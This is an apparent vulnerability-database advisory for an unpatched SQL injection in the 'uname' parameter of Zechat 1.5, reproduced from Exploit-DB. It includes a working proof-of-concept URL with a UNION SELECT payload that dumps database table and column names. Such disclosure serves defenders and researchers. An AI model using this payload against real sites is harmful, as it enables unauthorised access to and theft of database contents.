Zechat 1.5 - 'uname' SQL Injection

vendor:

Zechat

by:

Ihsan Sencan

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Zechat

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:bylancer:zechat

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Zechat 1.5 – ‘uname’ SQL Injection

Zechat 1.5 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands. The attacker can also use the 'uname' parameter to inject malicious SQL code into the application. The attacker can then use the make_set() function to extract data from the database.

Mitigation:

The application should validate user input and sanitize it before passing it to the database. The application should also use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

# Exploit Title: Zechat 1.5 - 'uname' SQL Injection
# Exploit Author: Ihsan Sencan
# Date: 2018-10-02
# Dork: N/A
# Vendor Homepage: https://bylancer.com/
# Software Link: https://bylancer.com/products/zechat-php-script/index.php
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

https://Target/products/zechat-php-script/profile.php?uname=demo

'+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229)--+-